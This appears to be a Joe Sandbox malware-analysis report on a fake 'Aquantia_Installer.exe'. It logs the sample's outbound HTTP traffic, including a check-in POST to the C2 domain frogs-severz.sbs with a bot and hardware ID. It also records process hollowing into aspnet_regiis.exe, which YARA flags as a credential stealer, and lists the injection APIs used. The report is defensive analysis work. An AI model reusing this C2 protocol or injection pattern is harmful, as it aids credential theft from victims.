2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: 40 aa 4e 8e 12 7e 1a 0e 01 b0 ce 4b e1 54 0d f6 0c e8 e1 7a 2d b8 d6 ac 8f d0 40 a0 c9 7f cc 55 85 88 d3 c8 15 a7 1e a8 5f 19 5c 9c ce 2c b0 ac f5 89 08 09 ec 55 ba 33 3e 61 66 2f 08 1e 51 e8 9c da b9 27 0e f3 77 cf af de 75 e6 b2 ce 25 01 46 67 35 e7 72 fa ac df 7d 12 29 e7 ba 20 4d fb 69 e6 82 42 e3 23 dd cd 3e de df 0f 93 62 5a 82 cd a1 92 e7 10 cc b3 36 cf b3 69 0d 02 43 b5 21 3a f9 01 b0 b7 21 4e d0 e2 38 13 b5 da 4a 34 89 d1 27 80 1e cc 03 b4 f8 7f ef 67 7a 08 f4 f7 e1 bd c2 12 81 d0 71 a0 83 57 a2 95 2d 26 1d 60 c9 64 01 2f 07 39 7a 1f 06 36 c0 c2 eb 72 f0 83 c3 9e 0d 6f f6 e9 48 ee 38 3e 79 77 01 77 01 b5 2b 9d 8e ce d5 00 9a 88 33 8c d6 ec 04 f6 bf a8 bd 53 1d dd 03 54 54 98 2f f6 76 9e a4 7b 1c 40 2e de 2a 51 7b 41 88 76 97 b5 b8 89 4e 24 93 2b Data Ascii: @N~KTz-@U_\,U3>af/Q'wu%Fg5r}) MiB#>bZ6iC!:!N8J4'gzqW-&`d/9z6roH8>yww+3STT/v{@.*Q{AvN$+
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: 15 50 8d 3b f4 0d 46 32 e1 58 39 23 92 03 9c 22 f1 67 b3 c6 01 5c 01 1b 41 a9 fc 21 6c ef f6 57 1c b1 e6 1a 8c 18 09 55 49 c2 3c c4 c0 9d f2 4f d2 f7 00 e8 79 d4 0a a7 78 19 00 68 42 bf a0 c8 a6 97 e3 45 8d 87 bc 81 84 e5 7d 38 85 73 67 6e c2 48 21 f7 1f 54 77 1e f9 df 5b a3 66 77 c0 f2 a3 4f 18 47 39 a2 bf a7 f8 f4 2e 6c 45 76 eb 96 7b 37 0c 8a 20 bf 0b 7f 39 8d c7 b7 c1 76 b0 30 2e b6 08 10 e2 16 e3 c2 71 a4 76 e3 df ca db 9d 1a c6 94 7d 24 2c a5 69 bb a0 9c 25 21 7b 10 20 db 39 73 f7 21 bc 23 e9 6e 42 64 ed aa f8 50 48 08 2d 71 4f fe 67 4a 98 75 6f cf a8 8d 37 7b 91 59 c3 8b e6 46 16 c3 91 2d d3 08 6e b0 7f 7b 42 07 46 9a f1 f0 0e c7 02 ae a5 d9 0d c5 a1 ce b2 50 64 2c 08 d7 35 c7 b9 16 fa 7b bd 40 b6 8e a5 1c 37 cc fd fd d9 f9 06 f9 da 56 75 b5 30 ed Data Ascii: P;F2X9#"g\A!lWUI<OyxhBE}8sgnH!Tw[fwOG9.lEv{7 9v0.qv}$,i%!{ 9s!#nBdPH-qOgJuo7{YF-n{BFPd,5{@7Vu0
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: b6 3e e7 c8 9a 99 81 3e 1e 1c d6 57 0a b6 7c 4d d2 ec 29 5a 06 e9 76 ba 2a 2c ec 33 9c f2 d0 88 a4 0e fa 7e 09 25 de b9 0c a2 67 4c f2 af bf 68 d1 66 b7 4e c6 0e 3a 3c d1 65 56 4f 53 a8 5e 31 e9 bc aa aa 25 04 c6 56 dc 7f 77 f9 b5 83 b7 f4 b4 02 b0 58 09 ff a1 37 7c ff 65 5a e5 b7 18 55 be e2 df df d8 25 26 b1 58 cb 4b d9 87 e3 dc 5b b6 af 30 c9 e1 21 fa f2 71 f0 41 eb 82 8f 8b 76 23 82 da 7a b3 28 15 1e e4 02 a9 6d 4e 5c e5 64 43 90 32 d3 15 0d e3 31 ca 44 04 17 dd ff eb f4 6c 52 38 e4 82 64 ed a4 ef f1 12 95 61 30 b0 41 f9 55 b2 27 05 24 f0 a4 bf 17 da f2 84 07 8e 6c 17 3d 1d 91 98 7c fd 60 dc 32 53 36 99 76 35 de 66 a2 f7 bd dc 37 85 96 2d 4b 8a 73 66 2a 2a 08 f9 d8 ff 5b 8b a4 cb cc 9e a0 cc 47 46 9b 2e e8 e6 d2 0e da 10 be 7b 72 7b a5 71 1f ee 46 bd Data Ascii: >>W\|M)Zv,3~%gLhfN:<eVOS^1%VwX7\|eZU%&XK[0!qAv#z(mN\dC21DlR8da0AU'$l=\|`2S6v5f7-Ksf*[GF.{r{qF
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: ca c8 c3 e5 85 c7 f3 74 af 61 8d d3 2b 4f 2a f7 f8 0d fd 15 b0 d2 ff d7 4a ce a9 b7 f5 54 7e 30 f6 85 43 c0 ec d4 5a b7 2e 38 32 e2 9a 63 0c a2 97 16 3a ed 5d 8f ba 04 8f 3f b8 30 5a 9f f8 e5 b0 56 d5 bf de 3d 85 2a 31 b0 3d b7 c8 1d f4 24 fe 93 cc 67 e6 7c 75 e9 f6 0e 23 a0 70 d9 88 a2 a6 49 ef 5b d7 4a c2 81 09 22 39 16 14 9e 7d 59 76 76 ac 7b de be f5 e6 de 3d 21 57 0b 94 8d 93 9b 66 09 dc 44 0c 30 1e 8c a0 a5 29 82 e8 6f 0b f1 93 03 0f 67 af d7 38 2b 31 d7 1d 28 db f6 cd 0a 5a 0e c8 e5 0f a1 3d cf d3 75 11 42 c9 0d 26 69 4b f6 ba 87 ed 68 eb 5f da af 7a a3 c2 7b 75 06 23 ce 21 10 81 c3 54 d3 d1 ac 2f c3 61 ee f7 52 2c cc a4 a2 66 6f 70 07 03 ac 33 a3 fc 76 f1 64 f8 ee c6 61 50 78 68 ad 1b 0f bc 8f 8e 8a 82 77 a8 4f 2d c0 7b 87 06 e6 32 7a e3 f4 dd fe Data Ascii: ta+OJT~0CZ.82c:]?0ZV=1=$g\|u#pI[J"9}Yvv{=!WfD0)og8+1(Z=uB&iKh_z{u#!T/aR,fop3vdaPxhwO-{2z
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: a3 e8 d0 83 79 0e 77 cc db 7e 0a 8a f5 7c 47 c7 e5 66 8c a4 bc e7 f4 65 17 9e 1e 51 a0 0b d5 17 55 a5 e4 9b a1 c3 f6 5e fe 15 ab cb 9b 36 e2 60 6a b6 0e 46 18 9f 4c bb 67 b8 c9 f8 e9 7e 24 85 9e d8 62 3a 83 28 39 66 0e 4c e9 c6 24 d3 c6 a1 25 59 90 3c 53 69 eb c6 a8 7b e6 7d 50 25 43 63 fb 6d 88 a4 21 76 9c c5 e8 68 3a 9b 4d b7 e5 7f c6 04 f3 00 41 c4 46 ef 7a 64 02 e1 05 ee 60 3f dc d9 19 1b 60 b8 00 16 f6 23 bc a1 4c 49 c5 50 fd ac ab e6 01 50 fd d0 c9 b8 ec e3 0c c6 a9 a6 be 70 88 4b 44 98 d7 47 66 5d 98 36 00 07 67 a5 ef b9 36 ad cb 1f 5e cb 12 63 48 0c 24 4a 03 1b d6 f0 e9 37 ec 85 98 a6 4d 16 67 fc d7 e6 e1 ee 09 c0 78 9a a4 f8 14 a2 6f f9 df 6d 42 c9 c7 7b 4b 21 46 bf 4b 67 f9 82 3e 58 1b 15 02 57 2f 53 d6 15 d5 09 a2 c7 5d 9a 96 bc 30 5c ca ad 22 Data Ascii: yw~\|GfeQU^6`jFLg~$b:(9fL$%Y<Si{}P%Ccm!vh:MAFzd`?`#LIPPpKDGf]6g6^cH$J7MgxomB{K!FKg>XW/S]0\"
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: b7 07 f2 b5 42 e4 9b 6c 4a 65 41 be 19 38 68 2c 5a c8 87 74 80 3c 6c 2e 7a 53 a6 f1 2c 0c 22 bd 31 3b 32 97 ec 6c 89 8a f0 60 19 60 4b 4c ad 97 53 a1 8d bd 98 a6 1b 6e 31 31 e7 74 4f dc 5f d3 8a 66 d9 b3 ca 3f 12 84 31 3d ed 3d 5a 82 16 72 4f 22 05 36 10 32 cb 4b 60 30 18 75 1b 12 ba 22 e4 d0 1f f1 4b e1 94 5d 1c fb 81 f3 60 46 d5 8d 8f aa 5a b8 de 85 ea da d0 9a 7f 25 44 ae 78 15 4a dd 6e bb 18 b7 32 fd 6f ff 8b e2 c2 6f 4d f8 23 87 62 46 fb e6 d5 aa 2a 02 03 bc 4e ce 2f 36 a4 0f ce b7 ec 31 1a 9c 2f 78 d3 a7 19 58 ef 7e 71 d1 e7 77 85 87 3d 5f 43 bf 3b 5d 9f 9e b6 c0 b4 1e aa 13 eb b6 b3 0f 52 b2 76 b1 1f ec 5e 5c 18 58 17 39 db 3a 89 45 ec b9 8e 79 16 28 8b d9 99 19 00 ce 04 56 1e c8 f5 a6 16 9b f1 f3 e3 bf 1f 55 19 aa b3 ed 13 ae d9 08 99 49 86 c2 ea Data Ascii: BlJeA8h,Zt<l.zS,"1;2l``KLSn11tO_f?1==ZrO"62K`0u"K]`FZ%DxJn2ooM#bF*N/61/xX~qw=_C;]Rv^\X9:Ey(VUI
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: a6 5e fc 5c 71 0c 76 15 5b f7 93 64 ec c5 8c 7e a8 b5 1d 7d 1a 17 ad 2f 7f 2c 9e 22 2d c4 05 88 cc 19 fe a8 d1 cf 66 ef b5 9c b4 4b 5b f6 e0 c0 b9 9d 57 74 cf 19 3b 94 7f db 69 58 3d 70 ed 8a fe b8 14 ae d7 65 bd 66 50 2e a4 93 eb 6c ec 32 a3 3e 34 63 fb f2 d6 79 c2 d3 a1 af 0b 15 2b fb a4 fe d5 8a 77 1e a7 8c 94 6c 84 e9 1b 6d 17 c6 13 77 09 7d bd a6 61 7f 55 b1 02 f4 3d 36 af 7d a8 92 7a 4b 01 47 04 38 cc b6 c3 81 61 5a 3c c3 43 a8 7f b8 b9 3e 43 b4 56 f9 82 2d c0 a0 47 35 3a 47 4e a8 76 21 ca 1e d0 ff fb bc 37 a1 68 f2 10 01 33 fc 28 04 5d b6 57 f9 1a 50 94 bb 22 7e e1 87 df 58 e9 f0 74 fc 23 d8 74 65 e4 53 f3 be 10 63 31 9c f9 9e 02 0f c2 3a 67 e7 b8 21 0e d5 1e 69 48 27 cf c4 59 3c b5 51 5d fc 41 2e 3e d8 08 e5 95 64 16 76 c8 1c 3a 40 89 ae 1c 4d e6 Data Ascii: ^\qv[d~}/,"-fK[Wt;iX=pefP.l2>4cy+wlmw}aU=6}zKG8aZ<C>CV-G5:GNv!7h3(]WP"~Xt#teSc1:g!iH'Y<Q]A.>dv:@M
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: 19 8a 2b 71 53 12 97 cc b1 0b ac bf c4 53 27 95 56 4a bb 5c e5 88 4f 1b 6a 65 c1 99 45 a1 b4 f8 6c d6 2d 84 57 b3 43 ae 6f 35 b7 93 8d e2 68 a8 68 d9 28 82 0b 9c 80 d4 d8 d9 c6 9b 51 9c 58 49 ad 44 c8 81 d7 b3 29 c9 66 49 88 2d 22 fd 5e 71 70 78 4b c8 a1 5f db ae 54 c5 70 2a 71 05 81 86 f8 f3 31 1e ed 51 25 a2 7f 9f 67 6b cc 8f bb 1e 7e f6 81 3a 8a de 98 b4 30 79 88 23 37 58 a4 9f 24 87 3b 2a d1 e4 b8 7e 5f 2a f9 05 4f 4e 0e c1 ce e7 17 73 59 3e 39 c5 08 32 dd 94 6e 38 80 38 06 12 ae ea ac 17 6b c6 16 92 c4 51 7a 22 6d 79 c5 9f ac e2 fa 56 9f 3c 5e 6b f9 9f 54 fb 8a c6 60 89 1f 05 1d 59 a6 1a 52 03 c1 6e d5 fc f9 b9 2e cf f5 2f eb 1f d6 66 d6 c4 40 cf fe 88 92 57 c2 75 c4 43 c0 8d 92 c8 78 31 f6 85 d9 a4 97 d7 45 d9 17 e6 b6 6a 01 6f d1 de df da 5e 18 c3 Data Ascii: +qSS'VJ\OjeEl-WCo5hh(QXID)fI-"^qpxK_Tpq1Q%gk~:0y#7X$;~_*ONsY>92n88kQz"myV<^kT`YRn./f@WuCx1Ejo^
2024-11-23 14:22:13 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:22:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ebkcetb9ihkgn97aeti0fagabm; expires=Wed, 19-Mar-2025 08:08:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5NQWtVlUedUUOJkdR3OSdJWIUF4hBPilKV%2FIjY%2BLj4uiWDypp%2Bk9hM6o5Q%2BRSnxwm5RtZRgmewds9WR1U1vUiUESFUDzf683L08aULHODOO1jfZkcCodFDOzsaGrZ7G3USR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71cf55acfb4364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=341&recv=591&lost=0&retrans=0&sent_bytes=2839&recv_bytes=592181&delivery_rate=1693735&cwnd=206&unsent_bytes=0&cid=c95b2976f8be5a08&ts=2623&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49722	172.67.155.47	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:22:14 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: frogs-severz.sbs
2024-11-23 14:22:14 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 26 6a 3d 26 68 77 69 64 3d 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--jqmircmzqpgf&j=&hwid=BDFA7B391BE94DD4BE8895FDBE41969D
2024-11-23 14:22:15 UTC	1007	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:22:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mvrub0am6g16r76jgclkpemh37; expires=Wed, 19-Mar-2025 08:08:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SOKR303pfKU1fgXNHnlKgr8aliIQtsAnkwMN77qo2AT0eI5aME42SEt4PfrGCyCYsDu1uPDz3D%2BQniVZ%2B%2FOCQdngtdzVUZxVU1mOfvZPyVaQIlFEhTQE8o41PBDqCRAX3DJS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71cf6f081a32ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1998&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=989&delivery_rate=1431372&cwnd=242&unsent_bytes=0&cid=da4b84b1c604a717&ts=744&x=0"
2024-11-23 14:22:15 UTC	54	IN	Data Raw: 33 30 0d 0a 45 4f 39 6c 63 35 76 75 4b 44 73 37 33 66 74 2f 54 6e 32 48 47 51 64 4e 50 4c 44 56 69 54 59 37 70 32 45 41 74 71 45 45 4d 53 56 4c 73 67 3d 3d 0d 0a Data Ascii: 30EO9lc5vuKDs73ft/Tn2HGQdNPLDViTY7p2EAtqEEMSVLsg==
2024-11-23 14:22:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:21:52
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\Aquantia_Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Aquantia_Installer.exe"
Imagebase:	0xfe0000
File size:	701'952 bytes
MD5 hash:	A19287453762B8BED2B6A7CE68C413CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:21:52
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:21:53
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x8c0000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2068337960.000000000312F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2136115217.000000000313E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2136092641.0000000003136000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:21:53
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1224
Imagebase:	0xb90000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8%
Total number of Nodes:	1520
Total number of Limit Nodes:	12

Executed Functions

Function 6CF26CA0 Relevance: 102.1, APIs: 30, Strings: 24, Instructions: 7607nativethreadmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 6CF28B51
ShowWindow.USER32 ref: 6CF28B82
VirtualAlloc.KERNELBASE ref: 6CF28E8C
CreateProcessW.KERNELBASE ref: 6CF296E3
NtGetContextThread.NTDLL ref: 6CF297D9
NtAllocateVirtualMemory.NTDLL ref: 6CF298F6
NtAllocateVirtualMemory.NTDLL ref: 6CF29B60
NtWriteVirtualMemory.NTDLL ref: 6CF29E54
NtWriteVirtualMemory.NTDLL ref: 6CF2A3A9
NtReadVirtualMemory.NTDLL ref: 6CF2BC77
NtWriteVirtualMemory.NTDLL ref: 6CF2BDA6
NtWriteVirtualMemory.NTDLL ref: 6CF2C1B6
NtCreateThreadEx.NTDLL ref: 6CF2C99C
NtSetContextThread.NTDLL ref: 6CF2CCC0
NtResumeThread.NTDLL ref: 6CF2CCDE
CloseHandle.KERNEL32 ref: 6CF2D03E
VirtualAlloc.KERNEL32 ref: 6CF2D25A
CreateProcessW.KERNEL32 ref: 6CF2D391
NtCreateThreadEx.NTDLL ref: 6CF2DA70
NtSetContextThread.NTDLL ref: 6CF2DAD4
NtResumeThread.NTDLL ref: 6CF2DAF2
CloseHandle.KERNEL32 ref: 6CF2DB66
CloseHandle.KERNEL32 ref: 6CF2DC48
VirtualAlloc.KERNEL32 ref: 6CF2DD1B
NtAllocateVirtualMemory.NTDLL ref: 6CF2DE6D
CloseHandle.KERNEL32 ref: 6CF2E113
CloseHandle.KERNEL32 ref: 6CF2E1C7
CloseHandle.KERNEL32 ref: 6CF2E1EA

Strings

OCUj, xrefs: 6CF2C437
w?M, xrefs: 6CF2A586
D, xrefs: 6CF2DD88
HWK5, xrefs: 6CF26CFF
$%2, xrefs: 6CF29265
OCUj, xrefs: 6CF2C3E6
1(O, xrefs: 6CF29671
<.:j, xrefs: 6CF2CFC9
\&zm, xrefs: 6CF2CDEF
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CF294C1, 6CF2D318
ntdll.dll, xrefs: 6CF28B9C
out`, xrefs: 6CF2C2B6
oMi", xrefs: 6CF28F5B
}l.|, xrefs: 6CF2A41D
6L$m, xrefs: 6CF2D5B3
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CF2959A, 6CF2DDD1
8Boc, xrefs: 6CF2C624
$%2, xrefs: 6CF291EF
6L$m, xrefs: 6CF2D639
kernel32.dll, xrefs: 6CF28B88
@, xrefs: 6CF2DE65
MZx, xrefs: 6CF28BB0, 6CF28BD2
\&zm, xrefs: 6CF2CD9E
w?M, xrefs: 6CF2A520

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: Virtual$Memory$Thread$CloseHandle$CreateWrite$AllocAllocateContext$ProcessResumeWindow$ConsoleReadShow
String ID: $%2$$%2$1(O$6L$m$6L$m$8Boc$<.:j$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$HWK5$MZx$OCUj$OCUj$\&zm$\&zm$kernel32.dll$ntdll.dll$oMi"$out`$w?M$w?M$}l.|
API String ID: 2504906999-3354862030
Opcode ID: b1aff970a5981a983126e8c97d6e53bec8ec97e8e9e675328aeffe4f12d538c8
Instruction ID: 685d9e00728c1a4891815473a733213ea0115762cc9f8a354d102f6a32c98b7a
Opcode Fuzzy Hash: b1aff970a5981a983126e8c97d6e53bec8ec97e8e9e675328aeffe4f12d538c8
Instruction Fuzzy Hash: 39D3E336B446608FDB08CE7CCD953DA77F2EB86311F218199D819DB794C63D8A898F81

Function 6CF21300 Relevance: 50.2, APIs: 19, Strings: 8, Instructions: 2969filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CF21FFE
GetModuleHandleA.KERNEL32 ref: 6CF2203C
GetModuleFileNameA.KERNEL32 ref: 6CF22273
CreateFileA.KERNELBASE ref: 6CF222B7
CloseHandle.KERNEL32 ref: 6CF2290D
MapViewOfFile.KERNELBASE ref: 6CF22A67
VirtualProtect.KERNELBASE ref: 6CF232DD
VirtualProtect.KERNELBASE ref: 6CF233C0
CloseHandle.KERNELBASE ref: 6CF23709
CloseHandle.KERNEL32 ref: 6CF2377F
CloseHandle.KERNEL32 ref: 6CF23791
GetCurrentProcess.KERNEL32 ref: 6CF23AC3
GetModuleHandleA.KERNEL32 ref: 6CF23B01
GetModuleFileNameA.KERNEL32 ref: 6CF23B49
CreateFileA.KERNEL32 ref: 6CF23B8D

Strings

|g(>, xrefs: 6CF23BD8
tV}G, xrefs: 6CF22400
|g(>, xrefs: 6CF22AC9
o`{M, xrefs: 6CF220FA
tV}G, xrefs: 6CF2237E
7?C, xrefs: 6CF22611
@, xrefs: 6CF232D1
I, xrefs: 6CF23F8D

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: Handle$File$CloseModule$CreateCurrentNameProcessProtectVirtual$View
String ID: @$I$o`{M$tV}G$tV}G$|g(>$|g(>$7?C
API String ID: 2215009834-1989921014
Opcode ID: 8d3e6fbe2a23bdf29da357340e19d2a1babb9678aefcb61f8082ecbd0a4adc5d
Instruction ID: 01cfedfa64aee4660cc3a1720ce0a498036f80bb443c9d6fb39259c814206133
Opcode Fuzzy Hash: 8d3e6fbe2a23bdf29da357340e19d2a1babb9678aefcb61f8082ecbd0a4adc5d
Instruction Fuzzy Hash: C7331336B852108FDF558E7CC8A53DA7BF2AB46361F108199C429CB794C73E8E898F01

Function 6CF25C40 Relevance: 9.5, APIs: 3, Strings: 2, Instructions: 713
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 6CF26076
NtQueryInformationProcess.NTDLL ref: 6CF2629D

Strings

NtQueryInformationProcess, xrefs: 6CF26170, 6CF265A2, 6CF26618
ntdll.dll, xrefs: 6CF2606A, 6CF265F7

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: HandleInformationModuleProcessQuery
String ID: NtQueryInformationProcess$ntdll.dll
API String ID: 2776635927-2906145389
Opcode ID: 9dc155040fc3370eff16b567b623f398533316d0f47b1b6956f2d4270a123421
Instruction ID: e6f690b449458ba6cdb01488aff923b1f0b1af992b5324b9800902bb4e5c8294
Opcode Fuzzy Hash: 9dc155040fc3370eff16b567b623f398533316d0f47b1b6956f2d4270a123421
Instruction Fuzzy Hash: 10420F76E15205CFCB04CEFCC5957EE7FF2AB46314F208119E429EB794C63A990A8B85

Function 6CF2F258 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CF2F29F
___scrt_uninitialize_crt.LIBCMT ref: 6CF2F2B9

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: d84c8442bed7676ddaeb7968bcd19368ca5db1fd4e6f7ca33f9e37a8e354675c
Instruction ID: 8e0b11b4b85b22cd36b9a00e2c1f5057177a2365669d324f8cf30ab7dc9e6a04
Opcode Fuzzy Hash: d84c8442bed7676ddaeb7968bcd19368ca5db1fd4e6f7ca33f9e37a8e354675c
